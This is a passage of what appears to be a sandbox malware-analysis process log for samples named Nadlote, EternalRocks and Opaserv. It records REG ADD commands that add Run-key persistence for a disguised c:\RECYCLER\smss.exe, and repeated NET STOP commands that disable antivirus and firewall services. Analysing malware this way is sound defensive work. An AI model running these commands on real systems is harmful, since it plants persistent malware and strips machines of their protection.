      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:2820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6080,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6124 /prefetch:8
  2⤵
  PID:7256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6064,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=7028 /prefetch:8
  2⤵
  PID:8128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6828,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6708 /prefetch:8
  2⤵
  PID:7200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5872,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6660 /prefetch:8
  2⤵
  PID:5880
- C:\Users\Admin\Downloads\Nadlote (1).exe
  "C:\Users\Admin\Downloads\Nadlote (1).exe"
  2⤵
  PID:7384
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:4908
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:4064
- - C:\Windows\SysWOW64\CMD.exe
    CMD /C "c:\RECYCLER\smss.exe"
    3⤵
    PID:2452
  - - \??\c:\RECYCLER\smss.exe
      c:\RECYCLER\smss.exe
      4⤵
      PID:7620
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:7768
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:8120
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:1788
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:5944
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:6900
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:7932
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:5220
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:8120
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:6548
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6892
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:2848
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:3740
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7628
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:5224
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:2052
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7204
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:8180
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:7788
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7536
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:7548
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2436
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:7256
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7312
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:7004
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:6728
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7964
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:5376
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:2236
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5744
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:6340
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:5800
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:560
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:7712
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6208
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:7804
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7844
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:4804
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7000,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3740 /prefetch:8
  2⤵
  PID:7648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7164,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6700 /prefetch:8
  2⤵
  PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6440,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6648 /prefetch:8
  2⤵
  PID:7556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6352,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  PID:7860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6040,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6608 /prefetch:8
  2⤵
  PID:388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6132,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6680 /prefetch:8
  2⤵
  PID:5772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7128,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5624 /prefetch:8
  2⤵
  PID:1088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5884,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1472 /prefetch:8
  2⤵
  PID:7896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7052,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6720 /prefetch:8
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6048,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6084 /prefetch:8
  2⤵
  PID:7440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5912,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6164 /prefetch:8
  2⤵
  PID:5556
- C:\Users\Admin\Downloads\EternalRocks.exe
  "C:\Users\Admin\Downloads\EternalRocks.exe"
  2⤵
  PID:7940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6744,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6988 /prefetch:8
  2⤵
  PID:5156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6364,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6792 /prefetch:8
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5824,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6292 /prefetch:8
  2⤵
  PID:404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6800,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6212 /prefetch:8
  2⤵
  PID:5820
- C:\Users\Admin\Downloads\Opaserv.l.exe
  "C:\Users\Admin\Downloads\Opaserv.l.exe"
  2⤵
  PID:6620
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5500
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:560
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:6772
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7244
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:3684
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:5912
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:6496
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:7516
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7840
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:7460
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:3460
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:3760
- - C:\WINDOWS\system\msload.exe
    C:\WINDOWS\system\msload.exe
    3⤵
    PID:336
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP NAVAPSVC
      4⤵
      PID:6356
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7788
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP NAVAPSVC
        5⤵
        
        PID:5532
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP PERSFW
      4⤵
      PID:6276
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5208
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP PERSFW
        5⤵
        
        PID:7760
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP AVPCC
      4⤵
      PID:5784
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7080
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP AVPCC
        5⤵
        
        PID:6068
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP MCSHIELD
      4⤵
      PID:4400
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP MCSHIELD
        5⤵
        
        PID:6632
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP SWEEPSRV.SYS
      4⤵
      PID:7100
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP SWEEPSRV.SYS
        5⤵
        
        PID:7884
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP NAVAPSVC
      4⤵
      PID:2004
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP NAVAPSVC
        5⤵
        
        PID:7412
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP PERSFW
      4⤵
      PID:5836
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4052
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP PERSFW
        5⤵
        
        PID:7544
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP AVPCC
      4⤵
      PID:4612
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7124
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP AVPCC
        5⤵
        
        PID:7392
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP MCSHIELD
      4⤵
      PID:7640
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6048
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP MCSHIELD
        5⤵
        
        PID:6244
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP SWEEPSRV.SYS
      4⤵
      PID:6616
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2820
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP SWEEPSRV.SYS
        5⤵
        
        PID:5232
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP NAVAPSVC
      4⤵
      PID:5248
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5636
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP NAVAPSVC
        5⤵
        
        PID:6152
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP PERSFW
      4⤵
      PID:964
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6704
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP PERSFW
        5⤵
        
        PID:7268
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP AVPCC
      4⤵
      PID:7224
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7356
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP AVPCC
        5⤵
        
        PID:7416
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP MCSHIELD
      4⤵
      PID:4960
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5680
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP MCSHIELD
        5⤵
        
        PID:6256
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP SWEEPSRV.SYS
      4⤵
      PID:7308
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP SWEEPSRV.SYS
        5⤵
        
        PID:5148
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP NAVAPSVC
      4⤵
      PID:2512
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7156
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP NAVAPSVC
        5⤵
        
        PID:5844
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP PERSFW
      4⤵
      PID:6596
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7984
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP PERSFW
        5⤵
        
        PID:4440
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP AVPCC
      4⤵
      PID:1444
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP AVPCC
        5⤵
        
        PID:6876
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP MCSHIELD
      4⤵
      PID:1800
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6528
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP MCSHIELD
        5⤵
        
        PID:6064
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP SWEEPSRV.SYS
      4⤵
      PID:5668
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6672
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP SWEEPSRV.SYS
        5⤵
        
        PID:6252
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP NAVAPSVC
      4⤵
      PID:4812
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6748
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP PERSFW
      4⤵
      PID:6108
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7972
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP AVPCC
      4⤵
      PID:3892
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:8056
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 STOP AVPCC
        5⤵
        
        PID:2452
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP MCSHIELD
      4⤵
      PID:5988
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1200
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP SWEEPSRV.SYS
      4⤵
      PID:7100
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1740
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP NAVAPSVC
      4⤵
      PID:7600
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:996
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP PERSFW
      4⤵
      PID:5244
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4556
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP AVPCC
      4⤵
      PID:6632
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7220
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP MCSHIELD
      4⤵
      PID:6532
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5180
  - - C:\Windows\SysWOW64\NET.exe
      NET STOP SWEEPSRV.SYS
      4⤵
      PID:6536
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6104,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5968 /prefetch:8
  2⤵
  PID:3412
- C:\Windows\system32\cmd.exe
